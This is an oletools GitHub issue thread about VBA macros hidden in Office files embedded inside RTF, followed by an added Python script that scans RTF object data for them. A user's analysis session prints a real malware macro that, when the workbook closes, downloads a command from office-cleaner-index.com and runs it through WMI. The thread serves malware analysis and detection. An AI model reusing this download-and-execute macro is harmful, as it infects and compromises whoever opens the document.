decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
http://www.decalage.info/python/oletools

olevba: file is RTF, which cannot contain VBA Macros? #643

Open dlucredativ opened 4 years ago

dlucredativ commented 4 years ago

When olevba scans an RTF file, it raises an error stating that RTFs cannot contain VBA Macros. Is this info outdated? rtfobj is able to extract OLE objects, but cannot, as far as I know, scan them for macros. olevba invoked on rtfobj-extracted OLE objects, however, can find macros. Is there a single oletools utility that can report VBA macros inside an RTF or, better, any relevant document type containing them?

decalage2 commented 4 years ago

Hi @dlucredativ, strictly speaking an RTF file cannot contain VBA macros by itself (it is not part of the RTF specifications, and Word cannot store VBA macros in an RTF file). However, you're right, it is possible to embed a Word, Excel, PowerPoint or Publisher file inside RTF using an OLE object, and those files may contain VBA macros. But then to activate the macro, the user would have to open the RTF, then double-click the OLE object, and then enable macros when the sub-document opens. I tried it with my latest version of Word, and so far I did not manage to run macros this way. I created a DOCM with VBA macros, and then embedded it inside an RTF file as an object. First, when opening the RTF, Word displays a specific warning message that the embedded document contains macros (not the usual "enable content" warning), even before displaying the RTF file: [image]

Second, even if I click the button to enable macros, nothing happens when I open the embedded document. I tried both Document_Open and Document_Close. So did you manage to run VBA macros from a file embedded into RTF, or did you see malware using that technique for obfuscation? I'd be curious to see if it works.

dlucredativ commented 4 years ago

> So did you manage to run VBA macros from a file embedded into RTF, or did you see malware using that technique for obfuscation? I'd be curious to see if it works.

I cannot test them, but real malware samples can be obtained via [1]. Some of them fit my question, e.g. [2] and its payload [3].

demo@vm:/tmp/malware ls
demo@vm:/tmp/malware SHA=2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f
demo@vm:/tmp/malware wget -q https://urlhaus-api.abuse.ch/v1/download/$SHA -O malware.zip && unzip malware.zip
Archive:  malware.zip
  inflating: 2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f
demo@vm:/tmp/malware file $SHA
2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f: Rich Text Format data, version 1, unknown character set
demo@vm:/tmp/malware olevba $SHA
olevba 0.56 on Python 3.8.5 - http://decalage.info/python/oletools
ERROR    Failed to open 2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f -- probably not supported!
Traceback (most recent call last):
  File "/usr/lib/python3.8/dist-packages/oletools/olevba.py", line 4351, in process_file
    vba_parser = VBA_Parser_CLI(filename, data=data, container=container,
  File "/usr/lib/python3.8/dist-packages/oletools/olevba.py", line 3904, in __init__
    super(VBA_Parser_CLI, self).__init__(*args, **kwargs)
  File "/usr/lib/python3.8/dist-packages/oletools/olevba.py", line 2786, in __init__
    raise FileOpenError(msg)
oletools.olevba.FileOpenError: Failed to open file 2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f is RTF, which cannot contain VBA Macros. Please use rtfobj to analyse it.
demo@vm:/tmp/malware rtfobj -d objects -s all $SHA
rtfobj 0.55.2 on Python 3.8.5 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: '2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f' - size: 974186 bytes
---+----------+---------------------------------------------------------------
id |index     |OLE Object                                                     
---+----------+---------------------------------------------------------------
0  |00002AD9h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '062b943b140f54f92bc79899abc27bdd'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
1  |00019734h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = 'fb468f15c09e079311484dc389054112'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
2  |00030355h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '76243fb4ed5a8f21f5e4bfb3af8a7a1c'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
3  |00046F76h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = 'eb1edb044cf095d075fbf1a2d326e34a'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
4  |0005DB9Eh |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = 'eac12b8618248835b8e8c8c20789e528'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
5  |000747BFh |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '5972477435f1cd45457ed4215ee7b284'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
6  |0008B3E0h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '07e49e5b1e6e654666014accb9f79b06'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
7  |000A2001h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '07c66587340f8d3f2b395db2663bf90c'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
8  |000B8C22h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = 'f82f79b71d989ac3a34499f69527f860'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
9  |000CF843h |format_id: 2 (Embedded)                                        
   |          |class name: b'Excel.Sheet.8'                                   
   |          |data size: 35328                                               
   |          |MD5 = '92bde4834b89d2867f093533a55e258f'                       
   |          |CLSID: 00020820-0000-0000-C000-000000000046                    
   |          |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)    
---+----------+---------------------------------------------------------------
Saving file embedded in OLE object #0:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin
  md5 062b943b140f54f92bc79899abc27bdd
Saving file embedded in OLE object #1:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00019734.bin
  md5 fb468f15c09e079311484dc389054112
Saving file embedded in OLE object #2:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00030355.bin
  md5 76243fb4ed5a8f21f5e4bfb3af8a7a1c
Saving file embedded in OLE object #3:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00046F76.bin
  md5 eb1edb044cf095d075fbf1a2d326e34a
Saving file embedded in OLE object #4:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0005DB9E.bin
  md5 eac12b8618248835b8e8c8c20789e528
Saving file embedded in OLE object #5:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000747BF.bin
  md5 5972477435f1cd45457ed4215ee7b284
Saving file embedded in OLE object #6:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0008B3E0.bin
  md5 07e49e5b1e6e654666014accb9f79b06
Saving file embedded in OLE object #7:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000A2001.bin
  md5 07c66587340f8d3f2b395db2663bf90c
Saving file embedded in OLE object #8:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000B8C22.bin
  md5 f82f79b71d989ac3a34499f69527f860
Saving file embedded in OLE object #9:
  format_id  = 2
  class name = b'Excel.Sheet.8'
  data size  = 35328
  saving to file objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000CF843.bin
  md5 92bde4834b89d2867f093533a55e258f
demo@vm:/tmp/malware file objects/*
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00019734.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00030355.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00046F76.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0005DB9E.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000747BF.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0008B3E0.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000A2001.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000B8C22.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000CF843.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Windows User, Last Saved By: Eng Moha, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Mar  1 14:36:15 2020, Last Saved Time/Date: Thu Mar 12 06:22:53 2020, Security: 0
demo@vm:/tmp/malware olevba objects/*
olevba 0.56 on Python 3.8.5 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00019734.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00030355.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00046F76.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0005DB9E.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000747BF.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_0008B3E0.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000A2001.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000B8C22.bin
OLE:M-SIH--- objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_000CF843.bin

(Flags: OpX=OpenXML, XML=Word2003XML, FlX=FlatOPC XML, MHT=MHTML, TXT=Text, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)

demo@vm:/tmp/malware olevba objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin
olevba 0.56 on Python 3.8.5 - http://decalage.info/python/oletools
===============================================================================
FILE: objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Private Sub Workbook_BeforeClose(Cancel As Boolean)

Worksheets(1).Activate
Call ccc
End Sub

-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas 
in file: objects/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f_object_00002AD9.bin - OLE stream: '_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub ccc()
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
Dm = "http://office-cleaner-index.com/fifa.jpg|||msxml2.xmlhttp"

g = Split(Dm, "|||")
Dim pageText1 As String
strURL = g(0)
VB = g(1)
Set xmlHttp = CreateObject(VB)
With xmlHttp
.Open "get", strURL, False
.send
pageText = .responseText
End With
pageText1 = pageText

Call At(pageText1)
End Sub

Function At(Str As String)

'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
Set oProcess = CreateObject("winmgmts:Win32_Process")

Set oInParams = oProcess.Methods_("Create"). _
    InParameters.SpawnInstance_

oInParams.CommandLine = Str
oInParams.ProcessStartupInformation = objConfig

Set oOutParams = oProcess.ExecMethod_("Create", oInParams)

End Function

-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt 
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet1
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open                |May open a file                              |
|Suspicious|Create              |May execute file or a system command through |
|          |                    |WMI                                          |
|Suspicious|Call                |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|msxml2.xmlhttp      |May download files from the Internet         |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |http://office-      |URL                                          |
|          |cleaner-            |                                             |
|          |index.com/fifa.jpg  |                                             |
+----------+--------------------+---------------------------------------------+

demo@vm:/tmp/malware 

[1] https://urlhaus.abuse.ch/browse/tag/rtf/
[2] https://urlhaus.abuse.ch/url/324574/
[3] https://urlhaus-api.abuse.ch/v1/download/2e5c2e6377e66becfdbd351c9531cc3c6fc61d22d911a3a7b93ee50a824ecb0f
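The thread's answer to the original question is a two-step pipeline: rtfobj pulls the OLE objects out of the RTF, and olevba is then run on each extracted file. The script below is an added example, not oletools code and not from this issue, that shows what that hand-off does under the hood with the standard library only: it locates every `\objdata` group in an RTF, hex-decodes it, reads the OLE 1.0 embedded-object header (OLEVersion, FormatID, length-prefixed class/topic/item names, NativeDataSize, NativeData, per MS-OLEDS), checks whether the native data is a Compound File (the `D0 CF 11 E0 A1 B1 1A E1` magic) and flags CFB payloads whose directory carries a `_VBA_PROJECT`/`VBA` entry name, which is a heuristic, not a parse of the CFB directory. If oletools happens to be installed, each CFB is additionally handed to olevba's `VBA_Parser(filename, data=...)` and `detect_vba_macros()` for a real check. The sample RTF it runs on is constructed in the script (a stub CFB with only a header and a UTF-16LE stream name, not a real workbook); run it with a file path to scan a real RTF instead.

```python
"""Scan an RTF for embedded OLE objects and flag those that may carry VBA.

Added example (not part of oletools): a stdlib-only model of the rtfobj -> olevba
hand-off discussed in this issue. The OLE 1.0 header layout follows MS-OLEDS 2.2.5.
"""
import re
import struct
import sys

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# CFB directory entry names are UTF-16LE; these are the storage/stream names olevba
# looks for in Office 97-2003 files. Substring search only: a heuristic, not a directory parse.
VBA_MARKERS = [s.encode("utf-16le") for s in ("_VBA_PROJECT", "VBA")]
FORMAT_NAMES = {1: "Linked", 2: "Embedded"}


def _objdata_groups(rtf: bytes):
    """Yield the raw content of every {\\*\\objdata ...} group, honouring nested braces."""
    for m in re.finditer(rb"\\objdata\b", rtf):
        depth, i, start = 1, m.end(), m.end()
        while i < len(rtf) and depth > 0:
            c = rtf[i:i + 1]
            if c == b"\\":            # escaped brace or control symbol: skip it and the next byte
                i += 2
                continue
            if c == b"{":
                depth += 1
            elif c == b"}":
                depth -= 1
            i += 1
        yield rtf[start:i - 1]        # content up to (not including) the closing brace


def _decode_hex(group: bytes) -> bytes:
    """Hex-decode an \\objdata body, ignoring whitespace and control words sprinkled into the run."""
    cleaned = re.sub(rb"\\[a-zA-Z]+-?\d* ?", b"", group)
    hexchars = re.sub(rb"[^0-9a-fA-F]", b"", cleaned)
    if len(hexchars) % 2:             # tolerate a truncated trailing nibble
        hexchars = hexchars[:-1]
    return bytes.fromhex(hexchars.decode("ascii"))


def _lp_ansi(buf: bytes, off: int):
    """Read a LengthPrefixedAnsiString: uint32 length, then that many bytes (NUL-terminated)."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    return buf[off:off + n].rstrip(b"\x00").decode("latin-1"), off + n


def parse_ole1(data: bytes) -> dict:
    """Parse an OLE 1.0 object: header, then NativeDataSize + NativeData for embedded objects."""
    ole_version, format_id = struct.unpack_from("<II", data, 0)
    off = 8
    class_name, off = _lp_ansi(data, off)
    topic_name, off = _lp_ansi(data, off)
    item_name, off = _lp_ansi(data, off)
    native = b""
    if format_id == 2:                # EmbeddedObject carries the actual file
        (size,) = struct.unpack_from("<I", data, off)
        native = data[off + 4:off + 4 + size]
    return {"ole_version": ole_version, "format_id": format_id,
            "format": FORMAT_NAMES.get(format_id, "Unknown"), "class_name": class_name,
            "topic_name": topic_name, "item_name": item_name, "native_data": native}


def _olevba_check(native: bytes):
    """Optional: let olevba decide, if oletools is installed; None when unavailable/unparseable."""
    try:
        from oletools.olevba import VBA_Parser
    except ImportError:
        return None
    try:
        vp = VBA_Parser("embedded.bin", data=native)
        found = vp.detect_vba_macros()
        vp.close()
        return found
    except Exception:
        return None


def scan_rtf(rtf: bytes) -> list:
    """Return one record per OLE object found in the RTF, with CFB and VBA indicators."""
    results = []
    for idx, group in enumerate(_objdata_groups(rtf)):
        blob = _decode_hex(group)
        if len(blob) < 8:
            continue
        info = parse_ole1(blob)
        info["index"] = idx
        native = info["native_data"]
        info["is_cfb"] = native.startswith(CFB_MAGIC)
        info["vba_marker"] = info["is_cfb"] and any(mk in native for mk in VBA_MARKERS)
        info["olevba_macros"] = _olevba_check(native) if info["is_cfb"] else None
        results.append(info)
    return results


def _lp(s: str) -> bytes:
    """Build a LengthPrefixedAnsiString (length 0 when the string is absent)."""
    b = s.encode("latin-1") + b"\x00" if s else b""
    return struct.pack("<I", len(b)) + b


def build_sample_rtf() -> bytes:
    """Constructed input: one embedded Excel.Sheet.8 OLE1 object wrapping a stub CFB
    (magic + a UTF-16LE '_VBA_PROJECT' name). Not a real workbook, not the issue's sample."""
    native = CFB_MAGIC + b"\x00" * 24 + "_VBA_PROJECT".encode("utf-16le") + b"\x00" * 8
    ole1 = (struct.pack("<II", 0x0501, 2) + _lp("Excel.Sheet.8") + _lp("") + _lp("")
            + struct.pack("<I", len(native)) + native)
    hexdata = ole1.hex().encode("ascii")
    lines = b"\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return (b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Excel.Sheet.8}"
            b"{\\*\\objdata " + lines + b"}}\\par Some text}")


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_rtf()
    for r in scan_rtf(data):
        print(f"object {r['index']}: format_id={r['format_id']} ({r['format']}) "
              f"class={r['class_name']!r} native={len(r['native_data'])} bytes "
              f"cfb={r['is_cfb']} vba_marker={r['vba_marker']} olevba={r['olevba_macros']}")
```

The marker check is deliberately conservative: it only says an embedded CFB *looks like* it carries a VBA project, which is exactly the point at which a real analysis should continue with olevba on the extracted bytes (as the session above does with `olevba objects/*`); the `\bin` form of object data and OLE 2 "Ole10Native" packages are not handled here.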